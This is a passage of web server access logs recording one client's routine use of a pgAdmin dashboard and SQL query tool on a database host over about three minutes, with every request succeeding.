(Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:38:07 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:38:08 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 264] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:38:37 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:38:41 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 264] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:38:46 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 264] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:38:46 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[26/Jan/2026:09:38:47 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=" [Client 84.1.26.27] [Length 2] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:38:48 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[26/Jan/2026:09:38:50 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[26/Jan/2026:09:38:52 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 264] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:38:52 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[26/Jan/2026:09:38:54 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[26/Jan/2026:09:38:56 +0000] - 200 200 - POST https db.profibot.hu "/settings/save_application_state" [Client 84.1.26.27] [Length 90] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[26/Jan/2026:09:38:56 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[26/Jan/2026:09:38:57 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 264] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:38:57 +0000] - 200 200 - POST https db.profibot.hu "/sqleditor/query_tool/start/3857941" [Client 84.1.26.27] [Length 138] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[26/Jan/2026:09:38:57 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/poll/3857941" [Client 84.1.26.27] [Length 472] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[26/Jan/2026:09:38:57 +0000] - 200 200 - POST https db.profibot.hu "/sqleditor/query_history/3857941" [Client 84.1.26.27] [Length 90] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[26/Jan/2026:09:38:58 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[26/Jan/2026:09:39:00 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[26/Jan/2026:09:39:02 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 264] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:39:02 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[26/Jan/2026:09:39:04 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[26/Jan/2026:09:39:06 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[26/Jan/2026:09:39:07 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:39:07 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 264] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:39:08 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[26/Jan/2026:09:39:10 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[26/Jan/2026:09:39:12 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 264] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:39:12 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[26/Jan/2026:09:39:14 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[26/Jan/2026:09:39:16 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[26/Jan/2026:09:39:17 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 264] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:39:18 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[26/Jan/2026:09:39:20 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[26/Jan/2026:09:39:22 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 264] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:39:22 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[26/Jan/2026:09:39:24 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[26/Jan/2026:09:39:26 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[26/Jan/2026:09:39:27 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 264] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:39:28 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[26/Jan/2026:09:39:30 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[26/Jan/2026:09:39:33 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 264] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:39:37 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:39:38 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 264] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:39:43 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 264] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:39:48 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 264] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:39:53 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 264] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:39:58 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 264] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:40:03 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 264] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:40:07 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:40:08 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 264] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:40:13 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 264] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:40:18 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 264] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:40:23 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 264] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:40:28 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 264] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:40:41 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 264] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:40:41 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:40:48 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[26/Jan/2026:09:40:48 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 264] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:40:50 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[26/Jan/2026:09:40:52 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[26/Jan/2026:09:40:52 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=" [Client 84.1.26.27] [Length 2] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:40:52 +0000] - 200 200 - POST https db.profibot.hu "/settings/save_application_state" [Client 84.1.26.27] [Length 90] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[26/Jan/2026:09:40:54 +0000] - 200 200 - POST https db.profibot.hu "/sqleditor/query_tool/start/3857941" [Client 84.1.26.27] [Length 138] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[26/Jan/2026:09:40:54 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[26/Jan/2026:09:40:54 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/poll/3857941" [Client 84.1.26.27] [Length 412] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[26/Jan/2026:09:40:54 +0000] - 200 200 - POST https db.profibot.hu "/sqleditor/query_history/3857941" [Client 84.1.26.27] [Length 90] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" 